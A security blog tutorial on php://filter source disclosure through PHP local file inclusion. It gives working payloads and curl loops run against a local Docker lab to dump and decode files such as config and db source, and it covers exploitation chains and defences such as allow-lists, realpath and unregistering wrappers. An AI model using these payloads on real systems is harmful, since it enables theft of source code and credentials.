TechEarl

php://filter Source Disclosure: How Attackers Read PHP Source via LFI

Ishan Karunaratne⏱️ 14 min readUpdated
Share thisCopied
php://filter source disclosure attack via LFI sink

php://filter is the LFI primitive that converted a "harmless" source-read bug into the way every modern PHP application gets its credentials stolen. It is not a vulnerability in PHP. It is a legitimate stream-processing feature that, layered on top of a vulnerable include() sink, lets an attacker pull the verbatim source of every PHP file the application ships in a sequence of plain GET requests. This article is the variant deep dive for the wrapper itself, sitting under the broader path traversal and LFI practitioner guide.

TL;DR

php://filter is a PHP stream wrapper that lets you compose filters (base64 encoding, character-set conversion, compression) over any file the engine can open. Pointed at a vulnerable LFI sink with convert.base64-encode, the wrapper streams the target file through base64 before include() ever tries to parse it as code, so the PHP engine echoes the encoded source back into the response instead of executing it. The attacker decodes the response and now has the verbatim source of config.php, db.php, every endpoint, every hard-coded credential. The trick works against the most common "fix" for classic LFI (appending .php to the requested filename), works whether or not allow_url_fopen is on (it is not a URL fetch, it is a stream wrapper), and works whether or not open_basedir is set against the docroot. The fix is upstream of the wrapper: stop passing user input to include, use an ID-to-path allow-list, and treat source disclosure as the recon step it is.

What php://filter actually is

php://filter is one of the stream wrappers PHP ships in the core, alongside file://, http://, ftp://, data://, and php://input. Wrappers are the abstraction that lets fopen, file_get_contents, include, and friends treat a URL-shaped string as a stream regardless of where the bytes actually live.

The filter wrapper is special among the family because it does not open a resource of its own. It opens a resource specified by its resource= argument and applies a chain of filters to the bytes as they flow through. The filters themselves are documented in the manual under filter types and split into four families: string filters (string.toupper, string.tolower, string.rot13, string.strip_tags), conversion filters (convert.base64-encode, convert.base64-decode, convert.quoted-printable-*, convert.iconv.*), compression filters (zlib.deflate, zlib.inflate, bzip2.*), and encryption filters (deprecated and removed in PHP 7.2).

The general shape is:

code
php://filter/<filter-1>/<filter-2>/.../resource=<underlying-path>

A legitimate use looks like reading a file and getting its contents in upper case in one call:

php
$shouty = file_get_contents('php://filter/string.toupper/resource=README.txt');

Or piping a compressed file through zlib.inflate and writing the result somewhere else:

php
copy('php://filter/zlib.inflate/resource=compress.zlib://archive.gz', 'out.bin');

These are not security bugs. They are the feature working as designed. The bug is what happens when the underlying resource= argument is attacker-controlled and the consumer is include().

The source-disclosure primitive

The canonical vulnerable PHP, the same shape covered in the parent path traversal article:

php
$page = $_GET['page'];
include($page . '.php');

Classic traversal fails here because the engine appends .php. A request for ?page=../../../../etc/passwd makes the engine look for /etc/passwd.php, find nothing, and return a warning. The suffix is the "fix" the developer reached for after reading a 2008 LFI tutorial, and against pre-wrapper attacks it works.

The php://filter payload:

code
GET /view.php?page=php://filter/convert.base64-encode/resource=pages/about

Walk through what the engine actually does:

  1. include($_GET['page'] . '.php') becomes include('php://filter/convert.base64-encode/resource=pages/about.php').
  2. The include opens that path as a stream. The filter wrapper recognises its own scheme, parses the path segments, and registers convert.base64-encode as the read filter.
  3. The wrapper opens the underlying resource, pages/about.php, as a normal file.
  4. As the file's bytes are read into the include's buffer, the base64 filter encodes them. What include() sees is no longer <?php $title = 'About'; ... ?>, it is PD9waHAgJHRpdGxlID0gJ0Fib3V0Jzs....
  5. The PHP engine tries to parse those bytes as PHP source. There are no <?php open tags inside the base64 alphabet, so the engine treats the whole stream as literal output (the same behaviour as a .txt file passed to include), and echoes it into the response body.
  6. The response now contains the base64-encoded source of pages/about.php. The attacker pipes the response through base64 -d and has the verbatim source.

The suffix is the part the wrapper composes with. pages/about.php is exactly the file the wrapper opens, because the appended .php rides along as part of the resource= value. The developer's "fix" became part of the working payload.

Why disabling allow_url_fopen does not stop it

The most common piece of LFI advice I read in 2016-era hardening guides is "set allow_url_fopen=Off and you are safe from the wrappers". It is wrong, and it has been wrong since the wrappers shipped. allow_url_fopen gates the URL-fetching wrappers, the ones that talk to a network, specifically http://, https://, ftp://, and ftps://. It does not gate php://, data://, or file://. From the PHP runtime configuration reference:

allow_url_fopen boolean. Enables the URL-aware fopen wrappers that enable accessing URL object like files. Default wrappers are provided for the access of remote files using the ftp or http protocol [...].

php://filter is not a URL-aware fetch; it is a stream that operates on the underlying file API. The same is true of php://input, data://, and php://memory. Turning allow_url_fopen off is good practice for other reasons (it kills SSRF-via-file_get_contents, it removes the http:// include path that legacy code reaches for), but it does nothing for the source-disclosure primitive.

The directive that does kill the worst LFI chain is allow_url_include, and even that only blocks php://input RCE, not source disclosure. php://filter is happy with either setting.

open_basedir is similarly weak here. It restricts which directories the filesystem functions can reach, but the entire LFI surface is the application's own docroot, which is inside open_basedir by definition. The wrapper happily reads every PHP file the application ships, which is exactly what the attacker wants. open_basedir only earns its keep if the attacker tries to reach /etc/passwd or /proc/self/environ, and those reads are not the high-value target. The source is.

Lab walkthrough

For everything below I am attacking the lfi-basic target from the techearl-labs companion repo, the same target used by the parent path traversal article. The two relevant endpoints:

EndpointSink shape
/view.php?page=pages/aboutinclude($_GET['page'] . '.php'), .php is appended
/view-raw.php?page=pages/about.phpinclude($_GET['page']), raw, no suffix

Boot the lab:

bash
docker compose up lfi-basic

The lab listens on http://localhost:8084.

Step 1: read the first source file

bash
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about'

The response is the normal page chrome wrapped around a long base64 blob where the page body would normally appear. Extract and decode:

bash
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=pages/about' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d

Out comes the verbatim source of pages/about.php. Same shape against pages/contact, pages/home, every page the application exposes.

Step 2: enumerate the application's source

The interesting files are not the page templates, they are the dispatchers, the database layer, and the shared layout. Walk them:

bash
for r in view view-raw shared/layout shared/header shared/footer config db includes/auth includes/session; do
  echo "=== $r.php ==="
  curl -s "http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=$r" \
    | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d
  echo
done

Most of those paths return errors or empty output (the file does not exist), and the ones that do return source hand back the sink shape of every other endpoint plus any credentials hard-coded in the codebase. Exactly the recon I want before I move on to writing the RCE payload.

Step 3: read the sink itself

bash
curl -s 'http://localhost:8084/view.php?page=php://filter/convert.base64-encode/resource=view' \
  | grep -oE '[A-Za-z0-9+/=]{40,}' | base64 -d

Reading the source of view.php itself tells the attacker exactly which sink shape is in play (include($_GET['page'] . '.php')), which is the prerequisite for choosing between the source-disclosure, php://input RCE, and log-poisoning chains documented in the parent article.

What attackers do with the source

Source disclosure is not the goal. It is the recon step that unlocks everything else. The five things I look for once I have the source of a PHP app:

  1. Hard-coded database credentials. db.php, config.php, wp-config.php, .env loaders. Database creds in source are still the modal config pattern in 2026 for small PHP applications, and the source-disclosure primitive pulls them straight out.
  2. API keys and signing secrets. Stripe secret keys, AWS access keys, JWT signing secrets, session encryption keys, CSRF token secrets. Anywhere the source instantiates a third-party SDK, the key is one read away.
  3. The exact sink shape of other endpoints. Knowing whether /upload.php validates extensions, whether /admin.php does an authentication check, whether /redirect.php does open-redirect validation, all of that comes free with the source. Black-box probing becomes white-box analysis.
  4. Backdoor admin endpoints. Forgotten /_debug.php, /install.php that never got deleted, /health.php that exposes phpinfo(). Source walks reveal them; brute-forcing URLs does not.
  5. Cryptographic mistakes. Static IVs, ECB-mode encryption, md5($password . $salt) patterns, JWT verification that calls the wrong function. Source review of the auth path tells you whether the session tokens are forgeable, which is the next chain after credential disclosure.

The pattern is consistent: source disclosure compresses a multi-week black-box test into a one-afternoon code review. That is why I treat it as a higher-severity outcome than people who categorise it as "information disclosure" suggest.

Other useful filters

convert.base64-encode is the workhorse, but a handful of other filters earn their keep:

  • string.toupper / string.tolower. Useful when a sink does case-insensitive comparison against a known string and you want to flip the case of the included content. Niche but occasionally decisive.
  • convert.iconv.*. Character-set conversion filters. The 2024 PHP filter chain RCE class, tracked as CVE-2024-2961, exploits an out-of-bounds write (up to 4 bytes past the output buffer) in glibc's iconv ISO-2022-CN-EXT converter that PHP exposes via the iconv filter. Chained with php://filter, the bug becomes a memory-corruption primitive callable from any LFI sink, which several public exploit kits turned into RCE against PHP applications running on glibc-based distros. Verify the exact CVE ID, the affected glibc versions, and the patch status against the NVD entry for CVE-2024-2961 before quoting specifics; my point here is structural, the iconv filter family has a real exploit history beyond the source-disclosure shape.
  • zlib.deflate / zlib.inflate. Compress or decompress the stream on the fly. Useful when the target file is already compressed (rare) and occasionally as a size-manipulation trick to land a payload within a length-limited buffer.
  • convert.base64-decode. The inverse of the source-disclosure filter. Useful when feeding an already-base64 encoded payload into a sink that decodes-and-executes, which shows up in some upload-handler bugs.

The filter family is general-purpose stream processing. The source-disclosure shape is what happens when you point it at a file-include sink. The iconv chain is what happens when you point it at a vulnerable C-level converter. The wrapper itself is not "bad"; it is sharp.

The fix

The headline rule is the same as for the rest of the LFI surface: do not pass user-controlled input to include, require, include_once, require_once, fopen, file_get_contents, readfile, or SplFileObject. If the input has to drive a file choice, map it through an allow-list.

php
$pages = [
  'about'   => '/srv/app/pages/about.php',
  'contact' => '/srv/app/pages/contact.php',
  'home'    => '/srv/app/pages/home.php',
];
$key = $_GET['page'] ?? 'home';
if (!isset($pages[$key])) {
  http_response_code(404);
  exit;
}
include($pages[$key]);

The user controls a key into a map, never a path. The wrapper has nothing to attach to because there is no concatenation step.

If for some reason the application genuinely has to accept a path fragment (legacy CMS, plugin loader), the canonical defence is realpath plus a prefix check, as covered in the parent article:

php
$base = realpath(__DIR__ . '/pages');
$target = realpath($base . '/' . $_GET['page'] . '.php');
if ($target === false || !str_starts_with($target, $base . DIRECTORY_SEPARATOR)) {
  http_response_code(403);
  exit('Forbidden');
}
include($target);

realpath returns false for any path that does not resolve to a real file, which short-circuits the php://filter/... argument before it reaches the include. The wrapper string is not a real filesystem path, so realpath returns false, and the request 403s. This is the part that actually closes the wrapper attack: the wrapper depends on the sink accepting a stream-shaped string, and realpath rejects anything that is not a concrete file.

A more aggressive defence is to forbid stream wrappers entirely at the engine level. PHP exposes stream_wrapper_unregister for this:

php
foreach (['php', 'data', 'phar', 'expect'] as $w) {
  if (in_array($w, stream_get_wrappers(), true)) {
    @stream_wrapper_unregister($w);
  }
}

Run this at the start of every entry point. It removes the php://, data://, phar://, and expect:// wrappers from the process for the lifetime of the request, so even a vulnerable sink cannot resolve php://filter/.... There is a cost: anything legitimate in your code that uses php://memory or php://temp (rare in application code, common in libraries) stops working. Verify against your own application before shipping this.

There is no flag-flip that "turns off php://filter" specifically. The wrapper is registered as part of the PHP core build. The choices are: do not pass user input to the sinks, unregister the wrappers per-request, or do not have the LFI bug in the first place.

Real-world incidents

A short tour of php://filter in production exploits. As with the parent article, the version-specific details age fast; verify against the linked advisory before quoting numbers.

  • CVE-2024-2961, glibc iconv out-of-bounds write reached via PHP filter chains. Disclosed by Charles Fol of Ambionics in April 2024. The bug is a memory-corruption issue in glibc's iconv ISO-2022-CN-EXT converter, but the exploit surface that made it widely weaponisable is the PHP iconv filter, which exposes the affected converter to any LFI sink via a crafted php://filter/convert.iconv.* chain. Several public exploits chain it into RCE against vulnerable PHP applications running on common Linux distros. Verify the CVE ID and the glibc patch status against the NVD entry before quoting specifics; my own check is that the disclosure date is April 2024 and the fix is in glibc 2.40, but treat that as a starting point for your own verification.
  • The "PHP filter chains for RCE" class generally. Before CVE-2024-2961, the same researcher published the technique of chaining iconv conversions to convert arbitrary file-read primitives into arbitrary code execution. The class of bugs is bigger than the single CVE: any time a PHP filter chain can be made to corrupt memory inside an iconv-style converter, the LFI sink underneath becomes an RCE sink.
  • WordPress LFI plugins. Search the WPScan vulnerability database for "Local File Inclusion" and pick any year. Every quarter ships at least one popular plugin with a ?file= parameter going straight into include, and every one of those is a php://filter source-disclosure primitive against the rest of the WordPress install (wp-config.php falls first, the database credentials follow). The pattern repeats in the Joomla and Drupal extension ecosystems on a similar cadence.
  • The 2010s-era CTF curriculum. php://filter was the canonical "second-level" LFI challenge across PicoCTF, HackTheBox, and TryHackMe boxes for most of the 2010s. The reason CTF authors keep using it is that it shows up against real applications often enough that learners need to recognise the shape on sight.

FAQ

Where to go next

php://filter is what makes LFI worse than the "read /etc/passwd" demo suggests. The suffix fix that buys a junior pentester a coffee buys an attacker the application source, every credential, and the sink shape of every other endpoint. The real fix is the same as the rest of the LFI surface: stop letting user input become a path. Map IDs to files, reject everything else, and the wrapper has nothing to attach to.

Sources

Authoritative references this article was fact-checked against.

Tagslfiphp-filtersource-disclosurephp-wrappers

Found this useful? Pass it on.

Copied

Ishan Karunaratne

Tech Architect · Software Engineer · AI/DevOps

Tech architect and software engineer with 20+ years building software, Linux systems, and DevOps infrastructure, and lately working AI into the stack. Currently Chief Technology Officer at a healthcare tech startup, which is where most of these field notes come from.

Keep reading

Related posts

How to Count Unique Matches with grep, sort, and uniq

The grep -o 'pattern' file | sort | uniq -c | sort -rn pipeline is the classic log-analysis one-liner. Why sort must come before uniq, how each stage works, worked examples for top IPs and status codes, the awk one-pass alternative for huge files, and the BSD vs GNU notes.

How to Count Matches with grep -c (and the Line-vs-Occurrence Trap)

grep -c counts matching LINES, not occurrences. A line with three hits still counts as 1. The fix is grep -o piped into wc -l, which puts every match on its own line first. Per-file counts, filtering out the :0 noise, counting non-matching lines, and the BSD vs GNU differences.